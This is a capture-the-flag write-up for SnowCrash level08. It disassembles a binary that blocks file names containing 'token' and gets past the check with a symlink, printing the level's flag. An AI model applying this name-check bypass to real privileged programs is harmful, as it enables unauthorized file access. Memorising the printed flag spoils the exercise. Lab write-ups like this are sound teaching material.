# Level08

## Disclaimer

So here I have to introduce some concepts as I will disassemble
the executable in the home: `level08`.

There it's not obvious what the addresses are but with a better disassembler
or some calculation we can get the offsets and variables positions to guess
what happens. I'm not there to teach disassembling so go look on [google](https://duckduckgo.com/)
if you are intrested.

## The meat

- Let's try to open the token file with `level08`:
	```bash
	level08@SnowCrash:~$ ./level08 token
	You may not access 'token'
	```

- First let's have a look at the symbols:
	```bash
	level08@SnowCrash:~$ nm -u level08
	[...]
	         U exit@@GLIBC_2.0
	         U open@@GLIBC_2.0
	         U printf@@GLIBC_2.0
	         U read@@GLIBC_2.0
	         U strstr@@GLIBC_2.0
	         U write@@GLIBC_2.0
	```
	So we seem to open a file (and not close it, BOOO). And there is probably
	a test with `strstr`.
- Here we see there is string `token` and the offset is important:
	```bash
	level08@SnowCrash:~$ strings -t x level08
	[...]
	    793 token
	[...]
	```
- By disassembling we can see that, in the main, there is a call to `strstr`
	with this string `token` as an arguement and a pointer that also called by open.
	```bash
	level08@SnowCrash:~$ objdump -d level08
	[...]
	80485a6:       8b 44 24 1c             mov    0x1c(%esp),%eax
	80485aa:       83 c0 04                add    $0x4,%eax
	80485ad:       8b 00                   mov    (%eax),%eax
	80485af:       c7 44 24 04 93 87 04    movl   $0x8048793,0x4(%esp)
	80485b6:       08
	80485b7:       89 04 24                mov    %eax,(%esp)
	80485ba:       e8 41 fe ff ff          call   8048400 <strstr@plt>
	80485bf:       85 c0                   test   %eax,%eax
	80485c1:       74 26                   je     80485e9 <main+0x95>
	[...]
	80485f2:       c7 44 24 04 00 00 00    movl   $0x0,0x4(%esp)
	80485f9:       00
	80485fa:       89 04 24                mov    %eax,(%esp)
	80485fd:       e8 6e fe ff ff          call   8048470 <open@plt>
	[...]
	```
- We can deduce that it searches for token in the name of the file we are trying to open.
	instead of looking at it's permissions.
- A symlink should do the trick here as there is no verification for the real name,
	only the one in the arguments.
	```bash
	level08@SnowCrash:~$ chmod +rwx .
	level08@SnowCrash:~$ ln -s token exploit
	level08@SnowCrash:~$ ./level08 exploit
	quif5eloekouj29ke0vouxean
	```

And bam:
> Ladies and gentlemen, we got him.
